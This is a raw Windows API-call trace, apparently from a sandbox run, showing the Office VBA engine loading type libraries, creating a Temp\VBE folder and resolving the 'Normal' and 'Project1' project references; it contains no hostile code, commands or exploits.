_Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0017.041] wcscpy_s (in: _Destination=0x7a57818, _SizeInWords=0xf, _Source="OLE Automation" | out: _Destination="OLE Automation") returned 0x0 [0017.041] ITypeLib:LocalReleaseTLibAttr (This=0x72df850) returned 0x0 [0017.041] wcscpy_s (in: _Destination=0xbd4dec8, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0017.041] ITypeLib:RemoteGetDocumentation (in: This=0x72df850, index=-1, refPtrFlags=0x287748, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1) returned 0x0 [0017.041] SysStringLen (param_1="stdole") returned 0x6 [0017.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0017.042] SysStringLen (param_1="stdole") returned 0x6 [0017.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x2dce158, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0017.042] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0017.042] strcpy_s (in: _Dst=0x287540, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0017.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x287540, cbMultiByte=7, lpWideCharStr=0x287390, cchWideChar=7 | out: lpWideCharStr="stdole") returned 7 [0017.042] IUnknown:AddRef (This=0x788e200) returned 0x4 [0017.042] ITypeLib:RemoteIsName (in: This=0x788e200, szNameBuf="stdole", lHashVal=0x106093, pfName=0x287460, pBstrLibName=0x287390 | out: pfName=0x287460*=0, pBstrLibName=0x287390) returned 0x0 [0017.042] IUnknown:Release (This=0x788e200) returned 0x3 [0017.042] IUnknown:AddRef (This=0x72e0930) returned 0x5 [0017.042] ITypeLib:RemoteIsName (in: This=0x72e0930, szNameBuf="stdole", lHashVal=0x106093, pfName=0x287460, pBstrLibName=0x287390 | out: pfName=0x287460*=0, pBstrLibName=0x287390) returned 0x0 [0017.042] IUnknown:Release (This=0x72e0930) returned 0x4 [0017.042] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x24) returned 0x778bc60 [0017.042] IMalloc:Free (This=0x7fefe9e5380, pv=0x7725040) [0017.042] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778be40 [0017.042] IMalloc:Free (This=0x7fefe9e5380, pv=0x778bc60) [0017.042] wcsncpy_s (in: _Destination=0x287340, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0017.042] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0017.042] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xbe) returned 0x78f7940 [0017.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x78f7940, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0017.042] IMalloc:Free (This=0x7fefe9e5380, pv=0x78f7940) [0017.042] wcscpy_s (in: _Destination=0x551e8d0, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0017.042] wcsncpy_s (in: _Destination=0x287380, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0017.042] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0017.042] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xbe) returned 0x78f7940 [0017.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x78f7940, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0017.042] IMalloc:Free (This=0x7fefe9e5380, pv=0x78f7940) [0017.042] wcsncpy_s (in: _Destination=0x287340, _SizeInWords=0x108, _Source="*\\Z035c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z035c2b45a3") returned 0x0 [0017.042] CharLowerBuffW (in: lpsz="*\\Z035c2b45a3", cchLength=0xd | out: lpsz="*\\z035c2b45a3") returned 0xd [0017.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035c2b45a3", cchWideChar=14, lpMultiByteStr=0x287270, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0017.042] _wcsicmp (_String1="*\\Z035c2b45a3", _String2="*\\Z035c2b45a3") returned 0 [0017.042] IUnknown:AddRef (This=0x72df850) returned 0x7 [0017.042] IUnknown:QueryInterface (in: This=0x72df850, riid=0x7fef10364b8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x287768 | out: ppvObject=0x287768*=0x0) returned 0x80004002 [0017.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x287730, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0017.043] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0017.043] IUnknown:Release (This=0x72df850) returned 0x6 [0017.043] IUnknown:Release (This=0x72df850) returned 0x5 [0017.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x287ad0, cbMultiByte=-1, lpWideCharStr=0x287a30, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL\\3") returned 69 [0017.046] lstrlenA (lpString="VBE") returned 3 [0017.046] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0017.046] _msize (_Block=0xa397f80) returned 0x26 [0017.046] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0017.046] lstrlenA (lpString="VBE") returned 3 [0017.046] _msize (_Block=0xa397fb0) returned 0x26 [0017.046] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0017.046] lstrlenA (lpString="VBE") returned 3 [0017.046] lstrcatA (in: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", lpString2="VBE" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" [0017.046] strcpy_s (in: _Dst=0xa39b790, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0017.047] strcpy_s (in: _Dst=0xa39b790, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0017.047] _mkdir (_Path="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0 [0017.047] strcpy_s (in: _Dst=0xa39b790, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0017.047] strcpy_s (in: _Dst=0xa39b790, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0017.047] strcpy_s (in: _Dst=0xa39b790, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0017.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa39b790, cbMultiByte=-1, lpWideCharStr=0x287840, cchWideChar=41 | out: lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 41 [0017.047] StringFromCLSID (in: rclsid=0xa397e2c*(Data1=0x3832d640, Data2=0xcf90, Data3=0x11cf, Data4=([0]=0x8e, [1]=0x43, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x5a)), lplpsz=0x287b10 | out: lplpsz=0x287b10*="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 0x0 [0017.047] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x27) returned 0x778be40 [0017.047] IMalloc:Free (This=0x7fefe9e5380, pv=0x78a2270) [0017.047] lstrlenA (lpString="VBE") returned 3 [0017.047] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 38 [0017.047] wsprintfA (in: param_1=0xa3ac770, param_2="%s;%s;&H%08lX" | out: param_1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0017.047] wsprintfA (in: param_1=0x287b38, param_2="&H%08lX" | out: param_1="&H00000001") returned 10 [0017.048] lstrcpynA (in: lpString1=0xa39b7b0, lpString2="Host Extender Info", iMaxLength=256 | out: lpString1="Host Extender Info") returned="Host Extender Info" [0017.048] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0017.048] lstrcpyA (in: lpString1=0xa39b9f0, lpString2="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" | out: lpString1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" [0017.048] IMalloc:Free (This=0x7fefe9e5380, pv=0x778be40) [0017.048] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x28) returned 0x778be40 [0017.048] GetCursorPos (in: lpPoint=0x287d60 | out: lpPoint=0x287d60*(x=777, y=852)) returned 1 [0017.048] GetCapture () returned 0x0 [0017.048] WindowFromPoint (Point=0x35400000309) returned 0x101e4 [0017.048] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x958 [0017.048] SendMessageA (hWnd=0x101e4, Msg=0x84, wParam=0x0, lParam=0x3540309) returned 0x1 [0017.048] SendMessageA (hWnd=0x101e4, Msg=0x20, wParam=0x101e4, lParam=0x2000001) returned 0x1 [0017.048] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0017.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7831c88, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0017.048] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0017.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7831c88, cbMultiByte=9, lpWideCharStr=0x7832168, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0017.049] IsCharAlphaA (ch=78) returned 1 [0017.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x287d60, cbMultiByte=-1, lpWideCharStr=0xa399170, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0017.049] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0017.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x287d60, cbMultiByte=-1, lpWideCharStr=0xa399170, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0017.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x287bb0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0017.049] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0017.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x287ba0, cbMultiByte=-1, lpWideCharStr=0x287b70, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0017.049] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0017.049] lstrlenA (lpString="Normal") returned 6 [0017.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x287ba0, cbMultiByte=-1, lpWideCharStr=0x287b20, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0017.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x287a60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0017.049] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0017.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x287a70, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0017.049] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0017.049] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0017.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7831c88, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0017.049] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0017.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7831c88, cbMultiByte=9, lpWideCharStr=0x7832168, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0017.049] lstrcmpA (lpString1="Project1", lpString2="Normal") returned 1 [0017.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x287a50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0017.049] lstrcmpiA (lpString1="Project1", lpString2="Normal") returned 1 [0017.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0017.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x287950, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0017.049] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0017.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6942a3e, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0017.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6942a3e, cbMultiByte=8, lpWideCharStr=0x7831c88, cchWideChar=8 | out: lpWideCharStr="Project1") returned 8 [0017.049] GetLocalTime (in: lpSystemTime=0x2877f0 | out: lpSystemTime=0x2877f0*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0xa, wMinute=0x31, wSecond=0x7, wMilliseconds=0x1f1)) [0017.049] wcsncpy_s (in: _Destination=0x2874a0, _SizeInWords=0x108, _Source="*\\Z035c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z035c2b45a3") returned 0x0 [0017.049] CharLowerBuffW (in: lpsz="*\\Z035c2b45a3", cchLength=0xd | out: lpsz="*\\z035c2b45a3") returned 0xd [0017.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035c2b45a3", cchWideChar=14, lpMultiByteStr=0x2873d0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0017.049] _wcsicmp (_String1="*\\Z035c2b45a3", _String2="*\\Z035c2b45a3") returned 0 [0017.050] GetLocalTime (in: lpSystemTime=0x2877f0 | out: lpSystemTime=0x2877f0*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0xa, wMinute=0x31, wSecond=0x7, wMilliseconds=0x1f1)) [0017.050] wcsncpy_s (in: _Destination=0x2874a0, _SizeInWords=0x108, _Source="*\\Z035c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z035c2b45a3") returned 0x0 [0017.050] CharLowerBuffW (in: lpsz="*\\Z035c2b45a3", cchLength=0xd | out: lpsz="*\\z035c2b45a3") returned 0xd [0017.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035c2b45a3", cchWideChar=14, lpMultiByteStr=0x2873d0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0017.050] _wcsicmp (_String1="*\\Z035c2b45a3", _String2="*\\Z035c2b45a3") returned 0 [0017.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x287860, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0017.050] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0017.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x287860, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0017.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x287720, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0017.050] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0017.050] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0017.050] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x30) returned 0x78185a0 [0017.050] IMalloc:Free (This=0x7fefe9e5380, pv=0x78a2210) [0017.050] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778bdb0 [0017.050] IMalloc:Free (This=0x7fefe9e5380, pv=0x78185a0) [0017.050] wcsncpy_s (in: _Destination=0x287520, _SizeInWords=0x108, _Source="*\\Z035c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z035c2b45a3") returned 0x0 [0017.050] CharLowerBuffW (in: lpsz="*\\Z035c2b45a3", cchLength=0xd | out: lpsz="*\\z035c2b45a3") returned 0xd [0017.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035c2b45a3", cchWideChar=14, lpMultiByteStr=0x287450, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0017.050] _wcsicmp (_String1="*\\Z035c2b45a3", _String2="*\\Z035c2b45a3") returned 0 [0017.050] strcpy_s (in: _Dst=0x79e1a60, _DstSize=0x7, _Src="Normal" | out: _Dst="Normal") returned 0x0 [0017.050] SysStringByteLen (bstr="潎浲污") returned 0x6 [0017.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7831c88, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0017.050] SysStringByteLen (bstr="潎浲污") returned 0x6 [0017.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7831c88, cbMultiByte=7, lpWideCharStr=0x7556228, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0017.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x287980, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0017.050] lstrlenA (lpString="Normal") returned 6 [0017.050] SysStringByteLen (bstr="潎浲污") returned 0x6 [0017.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7831c88, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0017.050] SysStringByteLen (bstr="潎浲污") returned 0x6 [0017.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7831c88, cbMultiByte=7, lpWideCharStr=0x7556228, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0017.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x287b60, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0017.050] lstrlenA (lpString="Normal") returned 6 [0017.051] lstrcmpiW (lpString1="Normal", lpString2="") returned 1 [0017.052] wcscpy_s (in: _Destination=0x2879c6, _SizeInWords=0x105, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0017.052] _wcsicmp (_String1="*\\CNormal", _String2="*\\Z035c2b45a3") returned -23 [0017.052] IUnknown:AddRef (This=0x788e200) returned 0x4 [0017.052] IUnknown:QueryInterface (in: This=0x788e200, riid=0x7fef1036290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x287428 | out: ppvObject=0x287428*=0x0) returned 0x80004002 [0017.052] IUnknown:Release (This=0x788e200) returned 0x3 [0017.053] IUnknown:AddRef (This=0x72e0930) returned 0x5 [0017.053] IUnknown:QueryInterface (in: This=0x72e0930, riid=0x7fef1036290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x287428 | out: ppvObject=0x287428*=0x0) returned 0x80004002 [0017.053] IUnknown:Release (This=0x72e0930) returned 0x4 [0017.053] IUnknown:AddRef (This=0x72df850) returned 0x6 [0017.053] IUnknown:QueryInterface (in: This=0x72df850, riid=0x7fef1036290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x287428 | out: ppvObject=0x287428*=0x0) returned 0x80004002 [0017.053] IUnknown:Release (This=0x72df850) returned 0x5 [0017.053] wcsncpy_s (in: _Destination=0x2870f0, _SizeInWords=0x108, _Source="*\\Z035c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z035c2b45a3") returned 0x0 [0017.053] CharLowerBuffW (in: lpsz="*\\Z035c2b45a3", cchLength=0xd | out: lpsz="*\\z035c2b45a3") returned 0xd [0017.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035c2b45a3", cchWideChar=14, lpMultiByteStr=0x287020, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0017.053] _wcsicmp (_String1="*\\Z035c2b45a3", _String2="*\\Z035c2b45a3") returned 0 [0017.053] wcsncpy_s (in: _Destination=0x2870f0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0017.053] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0017.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x287020, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0017.053] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0017.054] wcscpy_s (in: _Destination=0x551e680, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0017.055] wcsncpy_s (in: _Destination=0x2870f0, _SizeInWords=0x108, _Source="*\\Z035c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z035c2b45a3") returned 0x0 [0017.055] CharLowerBuffW (in: lpsz="*\\Z035c2b45a3", cchLength=0xd | out: lpsz="*\\z035c2b45a3") returned 0xd [0017.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035c2b45a3", cchWideChar=14, lpMultiByteStr=0x287020, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0017.055] _wcsicmp (_String1="*\\Z035c2b45a3", _String2="*\\Z035c2b45a3") returned 0 [0017.055] wcsncpy_s (in: _Destination=0x287130, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0017.055] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0017.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x287060, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0017.055] wcscpy_s (in: _Destination=0x77eabe0, _SizeInWords=0x108, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0017.055] _wfullpath (in: _Buffer=0x287940, _Path="Normal", _BufferCount=0x104 | out: _Buffer="C:\\Users\\aETAdzjz\\Desktop\\Normal") returned="C:\\Users\\aETAdzjz\\Desktop\\Normal" 